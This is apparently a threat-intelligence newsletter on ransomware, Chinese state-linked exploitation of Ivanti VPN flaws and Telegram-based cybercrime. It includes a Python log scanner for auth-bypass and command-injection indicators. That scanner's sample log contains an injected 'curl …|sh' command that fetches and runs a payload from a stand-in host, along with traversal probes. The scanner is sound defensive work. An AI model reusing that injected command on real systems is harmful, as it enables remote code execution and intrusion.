Deep and Dark Web Round Up

Weekly Highlights

  • For DarkOwl's continuing analysis of the conflict between Israel and Hamas and the cyber activity accompanying it, see the first section, "Middle East Conflict"
  • Johnson Controls conglomerate victim of ransomware, loses $27 million and 27 TB of data
  • China continues targeting US hardware, software
  • Telegram continues to play a pivotal role in the cybercrime ecosystem
  • Cyber Army Russia Reborn has overlap with Sandworm, demonstrates Russian proxy use

Middle East Conflict

Recent activities include Iranian and US officials calling for an immediate de-escalation after three US service members were killed in a drone attack this week. Claims of cyber-attacks and incidents against both Israel and Palestine continue to circulate online, as cyber actors use digital means to further their respective causes and beliefs:

  • Hezbollah Brigades (Kataib Hezbollah) Secretary-General al-Hamidawi announced, via the group's public Telegram channel, the suspension of military operations against US assets in Syria and Iraq; both Iranian and US officials called for steps that would reduce escalation and avoid formal conflict or additional loss of life after the three US service members were killed in action
  • Anonymous Sudan hacking group claimed it conducted a cyberattack targeting "critical parts" of healthcare infrastructure in Israel, adds "more than a thousand devices are completely disconnected."
  • Terminator Security hacking group claims to have taken down Israeli Air Force servers

Malware/Ransomware

Johnson Controls suffers ransomware attack

Industrial control systems and building security equipment giant Johnson Controls was the victim of a ransomware attack that cost the company $27 million. The attackers gained initial access through the company's offices in Asia and then spread across its entire corporate network; the incident disrupted customer-facing systems and resulted in the loss of 27 TB of corporate data.

China continues to target US hardware and networks

The Chinese state-sponsored group Volt Typhoon's continued targeting of small office/home office (SOHO) routers led the FBI to issue guidance to SOHO router manufacturers this week, aimed at eliminating the vulnerabilities the group exploits.

Additionally, a separate Chinese state-linked group has exploited CVE-2023-46805 and CVE-2024-21887 since December 2023 in its continued efforts to undermine US technology. The two vulnerabilities, an authentication bypass and a command injection in Ivanti Connect Secure and Ivanti Policy Secure VPN appliances, can be chained for unauthenticated remote code execution. A patch was released January 26, 2024.

Both of these early 2024 activities follow CISA's September 2023 advisory cautioning that the Chinese state-linked group "BlackTech" had used RATs and other malware to extensively target router firmware in the US and Japan.
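The round up does not describe how the two Ivanti CVEs are exploited, so the following is an added example and not DarkOwl's tooling or a vendor signature: a generic log-scanning heuristic for the two bug classes involved (an authentication bypass via path traversal and a command injection), run over a constructed sample of VPN appliance access logs. The log format, hostnames, request paths and IP addresses are all invented for the example and deliberately do not reproduce the real exploit URIs.

```python
"""Heuristic scan of VPN appliance access logs for a chained auth-bypass /
command-injection pattern. Added example; not DarkOwl's code and not a
signature for CVE-2023-46805 / CVE-2024-21887 specifically.

Assumptions: a simplified combined-style access log (constructed below),
invented request paths, and documentation-range IP addresses.
"""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample log. 203.0.113.7 probes a traversal bypass (plain and
# percent-encoded), then injects shell commands; 198.51.100.20 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2024:03:14:07 +0000] "GET /vpn/login HTTP/1.1" 200 5120
203.0.113.7 - - [02/Jan/2024:03:14:09 +0000] "GET /api/v1/public/../../admin/settings HTTP/1.1" 200 812
203.0.113.7 - - [02/Jan/2024:03:14:11 +0000] "GET /api/v1/public/%2e%2e/%2e%2e/admin/settings HTTP/1.1" 200 812
203.0.113.7 - - [02/Jan/2024:03:14:13 +0000] "POST /api/v1/admin/tools/ping?host=127.0.0.1;curl%20http://203.0.113.9/x|sh HTTP/1.1" 200 64
198.51.100.20 - - [02/Jan/2024:08:01:00 +0000] "GET /api/v1/public/status HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# A ".." path segment bounded by slashes or backslashes, after decoding.
TRAVERSAL_RE = re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)')
# Shell operators that have no business in a query string. '&' alone is a
# legitimate parameter separator, so only '&&' is flagged (heuristic tradeoff).
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(|&&')


def normalize(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double/triple encoding does not hide '..'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target: str) -> list[str]:
    """Return the bug-class indicators found in one request target."""
    reasons = []
    parts = urlsplit(target)
    if TRAVERSAL_RE.search(normalize(parts.path)):
        reasons.append("path-traversal")
    if SHELL_META_RE.search(normalize(parts.query)):
        reasons.append("shell-metachars")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each line and keep those whose request target looks hostile."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "target": m["target"], "reasons": reasons,
            })
    return findings


def chained_sources(findings: list[dict]) -> list[str]:
    """Source IPs that show both classes: the bypass-then-inject chain."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["ip"]].update(f["reasons"])
    return sorted(ip for ip, r in seen.items()
                  if {"path-traversal", "shell-metachars"} <= r)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        # A 200 on a traversal request is the worrying case: the bypass worked.
        print(f'{h["ip"]} {h["ts"]} {h["status"]} {",".join(h["reasons"])} {h["target"]}')
    print("chained:", chained_sources(hits))
```

The status code is kept on each finding because a traversal request answered with 200 rather than 401/403 is the strongest sign that an authentication bypass actually succeeded; on a real appliance the next step is the vendor's integrity checker, not more log grepping.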

Threat Actor Activity

Russian Market removed market sections titled “RDP” and “Dumps” from their platform. DarkOwl analysts will continue to track changes to this marketplace and provide updates accordingly. No motive or reason was publicly provided for the change to their platform.

Telegram continues to facilitate attacks with phishing/ransomware kits and malware sales

Telegram continues to play a critical role at the center of cybercrime. Not only does the messaging platform allow actors to trade tips on attacking, infiltrating, and compromising technical systems, it also provides private channels and messaging between actors and groups who play pivotal roles in geopolitical conflicts.

“Cyber Army Russia Reborn” posts various databases, affiliations questioned

Advertising an Australian cab service database, a newly re-formed "Cyber Army Russia Reborn" (CARR) returned to the cybercrime scene. In January 2024, the group posted several other databases that did not match its typical targeting pattern. DarkOwl analysts will continue to monitor the actions of this group to determine its true affiliation and motives.

Notable Leaks and Breaches

Suggested Further Reading

About DarkOwl

DarkOwl uses machine learning to automatically, continuously, and anonymously collect, index, and rank darknet, deep web, and high-risk surface net data, making that data simple to search.

Our platform collects and stores data in near real time, allowing darknet sites that frequently change location and availability to be queried safely and securely without having to access the darknet itself.

DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. As importantly, DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. Our passion, our focus, and our expertise are the darknet.

For more information, visit www.darkowl.com.
